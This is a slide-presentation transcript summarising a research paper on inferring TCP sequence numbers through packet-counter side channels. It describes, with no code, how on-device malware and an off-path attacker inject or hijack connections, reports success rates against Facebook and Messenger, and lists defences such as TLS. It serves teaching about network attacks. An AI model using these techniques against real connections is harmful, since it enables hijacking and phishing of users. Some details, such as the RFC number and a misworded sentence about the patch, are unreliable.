Presentation is loading. Please wait.

Presentation is loading. Please wait.

University of Michigan

Similar presentations


Presentation on theme: "University of Michigan"— Presentation transcript:

1 University of Michigan
Collaborative TCP Sequence Number Inference Attack — How to Crack Sequence Number Under A Second Zhiyun Qian, University of Michigan Z. Morley MAO Yinglian Xie MicrosoftResearch, Silicon Valley

2 Brief History TCP was not designed for security, so numerous patches were added to it to maintain security. One such patch is randomization of TCP Initial Sequence Number(ISN) introduced in RFC 1948 and later modified in RFC 2012. The patch was proposed to inject off-path spoofing attacks attempting to inject packets with forged source addresses. ISN randomization prevents easy prediction of ISN. The patch has largely rendered ,most sequence number guessing attacks very hard to succeed.

3 ISN = M + F(localhost, localport, remotehost, remoteport)
Brief History Cont. A function has been defined to obtain a random sequence number and a unique number obtained using a 4 micro second timer M, to minimize the probability of guessing sequence numbers. The following equation is used to generate the initial sequence number. ISN = M + F(localhost, localport, remotehost, remoteport) where F is a MD5 hash function.

4 CONTENTS Introduction TCP Sequence Number Inference Attack
Design and Implementation of TCP Attacks Attack Impact Analysis Conclusion

5 INTRODUCTION In 2007, a study reported in Pharack Magazine has revisited the problem and claimed that TCP sequence number can still be inferred based on how a host treats in-window and out-of-window incoming packets. In 2012 researchers discovered that sequence number inference attack can be more generally applicable impacting even short-lived HTTP connections. However this attack heavily relies on the presence of sequence-number-checking firewall middleboxes deployed in the network.

6 INTRODUCTION The paper work generalizes these attacks by eliminating the strong requirements imposed on them to enable broader class of attacks. The paper makes the following key contributions Building a threat model Sequence-Number-Dependent Counters An efficient way to complete the sequence number inference

7 TCP SEQUENCE NUMBER INFERENCE ATTACK
Threat Model Packet Counter Side Channels TCP Incoming Packet Validation Sequence-Number-Dependent Counter in Linux Sequence-Number-Dependent Counter in BSD/Mac Sequence-Number-Dependent Counter in Windows Inference Performance and Overhead Noisiness of Sequence-Number Dependent Counters

8 THREAT MODEL There are four main entities of this threat model:
1. The victim smartphone and a target application, constituting the attack target. 2. The legitimate server, which talks to the victim smartphone using an unencrypted application-layer protocol (e.g,HTTP). 3. The on-device malware, which is unprivileged and cannot tamper with other apps directly. 4. The off-path attacker, who is capable of spoofing the IP address of the legitimate server

9 Threat Model Flow In the figure 1, we explain a basic flow of the threat model. In here the attacker sends probing packets to the target and the malware residing in the target checks if the attacker has sent the correct sequence number or not and replies with a feedback.

10 Threat Model At High level, the off-path attacker needs two pieces of information: The four tuples of a target connection, i.e., source/destination IP addresses and source/destination port numbers The correct Sequence Number The on-device malware can easily identify the current active connection, but it doesn’t know the sequence number in use.

11 Packet counter side channels
We look at a particular type of side channel, packet counters, that can potentially provide indirect feedback on whether a guessed sequence number is correct. Some of the processes could be used to attain this. “netstat -s " exposes a set of information on all major Oses including Microsoft Windows, Linux, BSD, Mac OS and smartphone OSes like Android and iOS. The IPID side channel can be considered as a special form of packet counter that records the total number of outgoing packets since it is incremented for every outgoing packet.

12 TCP incoming packet validation
There exist five main checks performed by Linux TCP stack based on the corresponding source code as well as the controlled experiments in the paper. These checks are performed for any incoming TCP packet that is deemed to belong to an established connection based on the four tuples. Error check Sequence Number Check Acknowledge Number Check Payload check(if any) Retransmission Check

13 Y-First Un Acknowledged Sequence Number
TCP Incoming Packet Validation Error Check is for the purpose of dropping invalid packets early on. Sequence Number check checks if the packet is in window. ACK number should be within [Y,Y+outstanding_bytes]. 0-payload check is used to check if the packet has payload or not. Retransmission check is used to check if the ending sequence number of the packet is smaller than or equal to the next expected sequence number. Y-First Un Acknowledged Sequence Number outstanding_bytes-Total number of outstanding bytes yet to be acknowledged

14 Sequence Number Dependent Counter in Linux
In here we find the sequence-number-dependent counters. The “if" condition says if the packet's starting sequence number is not equal to its ending sequence number ( i.e., the packet has nonzero pay-load), and its starting sequence number is “before" the expected sequence number, then a packet counter named DelayedACKLost is incremented.

15 SERVER- SIDE SEQUENCE NUMBER INFERENCE
Sequence number inference illustration using DelayedACKLost packet counter (four-way search) Sequence number inference illustration using the DelayedACKLost packet counter (binary search)

16 Sequence Number Dependent Counter in BSD/Mac OS
The work in the paper also explains the finding of sequence dependent counters in BSD/Mac OS, they are. rcvduppack and rcvdupbyte rcvpackafterwin and rcvbyteafterwin rcvoopack and acvoobyte rcvdupack and rcvacktoomuch The first three pairs can be used to infer server-side sequence numbers. The last pair is used to determine the client-side sequence numbers.

17 Sequence Number Dependent Counter in windows
Microsoft Windows Oses do not expose such sequence number dependent counters and are not vulnerable to the attack. On windows 7 for example, the TCP related packet counters include the total number of incoming packets, outgoing packets , and the number of packets retransmitted from the output of “netstat -s”. These Packet counters do not leak sequence numbers directly.

18 Inference Performance overhead
A sequence number inference is implemented on android and Mac OS. As shown in figure 7, we can see that the general tradeoff is that the fewer iterations an attacker wants, the more bytes he needs to send in total. In Figure 8,we see that the inference time increases as the RTT between attacker and client increases.

19 Noisiness of sequence number dependent counters
In the paper the authors have claimed that these sequence number dependent counters are clean side channels that rarely increment, naturally even with background traffic. To quantitatively support this claim a worst case scenario experiment is carried out. An Youtube page video is opened at the background and web pages are browsed at the same time to see how often the counters get incremented. The experiment indicates that the probability that the counter increments due to noise and interference with one round of probing is roughly 0.059%.

20 DESIGN AND IMPLEMENTATION OF TCP ATTACKS
Attack Requirements Client-Side TCP Injection Passive TCP Hijacking Server-Side TCP Injection Active TCP Hijacking

21 ATTACK REQUIREMENTS Malware on the client with Internet access.
Malware that can run in the background and read packet counters Malware that can read the list of active TCP connections and their four tuples A predictable external port number if NAT is deployed

22 CLIENT-SIDE TCP INJECTION
In this attack, an attacker attempts to inject malicious data into a connection established by other apps on the phone. The essential part of the attack is the TCP sequence number inference which has already been described in detail. The challenge is that the injected data may compete with the data sent from the legitimate server. For instance, considering the connection under attack is an HTTP session where a valid HTTP response typically follows immediately after the request is sent, by the time the sequence number inference is done, at least part of the HTTP response is already sent by the server. The injected HTTP packets likely can only corrupt the response and cause denial of service instead of serious damage

23 CLIENT-SIDE TCP INJECTION
The idea is to leverage two common scenarios: 1. The server may take a long time to process a request and assemble the response. This is especially common as many services (websites) take longer than 100ms or more to process a request. The fact that the sequence number inference time in certain scenarios (when RTT from the server to the client is small) can be made below 100ms makes the injection attack as powerful as hijacking. 2. A single TCP connection is reused for more than one pair of HTTP request and response. The idea is to use the inferred sequence number for injecting malicious data not on the first HTTP request but the later ones. In both cases, an attacker has enough time to conduct sequence number inference

24 PASSIVE TCP HIJACKING

25 ACTIVE TCP HIJACKING

26 Attack impact analysis from case studies
Facebook Javascript Injection Phishing Facebook Login Page Command Injection on Windows Live Messenger Restricted Facebook Login Page Hijack

27 Success rates and analysis of the attacks
The success rate for Facebook javascript injection even when RTT=100ms is 87.5% The success rate for phishing Facebook Login Page is below 50% and when we use two nodes for latency values of 70ms and 100ms the rate increases to 62.5% and 82.5%. Command Injection on Windows Live Messenger was carried out using server-side TCP injection wherein adding friend or removing existing friend, changing status messages, sending messages to friends has been carried out with an inference time of around 2-3 seconds. Restricted Facebook Login page Hijack could be performed depending on the criteria that the user be convinced that the app indeed has a relationship with the target website so that the user will enter his password into the browser.

28 Conclusion The paper provides few defense strategies to avoid the attack. Always using SSL/TLS Removing unnecessary global data or only allow privileged programs to access such state. Providing better isolation among resources.

29 QUESTIONS ?


Download ppt "University of Michigan"

Similar presentations


Ads by Google